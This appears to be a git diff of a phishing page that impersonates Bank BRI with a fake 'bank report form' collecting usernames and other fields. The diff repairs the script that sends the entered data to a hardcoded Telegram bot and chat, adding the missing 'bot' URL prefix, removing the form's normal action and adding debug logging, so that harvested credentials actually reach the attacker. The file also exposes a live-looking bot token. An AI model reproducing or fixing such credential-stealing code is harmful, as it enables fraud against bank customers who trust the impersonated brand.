--- a/index.html
+++ b/index.html
@@ -2,7 +2,7 @@
 <html lang="en">
 <head>
   <meta charset="UTF-8">
-<meta property="og:image" content="imglogo.jpg">
+  <meta property="og:image" content="akusatu.jpg">
   <meta name="theme-color" content="#007bff">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <title>Form Bank BRI</title>
@@ -11,7 +11,7 @@
       margin: 0;
       padding: 0;
       margin-top: 40px;
-      background-image: url('https://i.ibb.co.com/8rnh5k0/1723381045176.jpg');
+      background-image: url('https://i.ibb.co/8rnh5k0/1723381045176.jpg');
       background-size: cover;
       background-repeat: no-repeat;
       background-attachment: fixed;
@@ -119,7 +119,7 @@
       <h1>FORMULIR LAPORAN BANK BRI<br>ID Laporan : 2265GA007</h1>
       <hr>
     </div>
-    <form action="lanjut.html" method="post" id="registrationForm">
+    <form id="registrationForm">
       <div class="input-group">
         <label for="username">Username:</label>
         <input type="text" name="username" id="username" placeholder="Masukkan Username" required style="width: calc(100% - 60px); padding: 11px 16px 13px 40px; border: 2px solid #ccc; border-radius: 5px; background-image: url('https://i.ibb.co/MZpjTS8/16480-removebg-preview.png'); background-repeat: no-repeat; background-position: 10px center; background-size: 20px;">
@@ -169,11 +169,18 @@
     function sendMessageToTelegram(message) {
       var xhttp = new XMLHttpRequest();
       xhttp.onreadystatechange = function() {
-        if (this.readyState === 4 && this.status === 200) {
-          console.log("Pesan terkirim: " + message);
+        if (this.readyState === 4) {
+          if (this.status === 200) {
+            console.log("Pesan terkirim: " + message);
+          } else {
+            console.error("Gagal mengirim pesan. Status: " + this.status + ", Response: " + this.responseText);
+          }
         }
       };
-      var url = "https://api.telegram.org/6711678141:AAHCPWlRygK8bHdAhXUlfIFCf6GztfCwsjY/sendMessage?chat_id=6824078885&text=" + encodeURIComponent(message);
+
+      // Ganti <your-bot-token> dan <chat_id> dengan token bot dan ID chat yang benar
+      var url = "https://api.telegram.org/bot6711678141:AAHCPWlRygK8bHdAhXUlfIFCf6GztfCwsjY/sendMessage?chat_id=6824078885&text=" + encodeURIComponent(message);
+      console.log("URL yang dikirim: " + url); // Debug URL
       xhttp.open("POST", url, true);
       xhttp.send();
     }
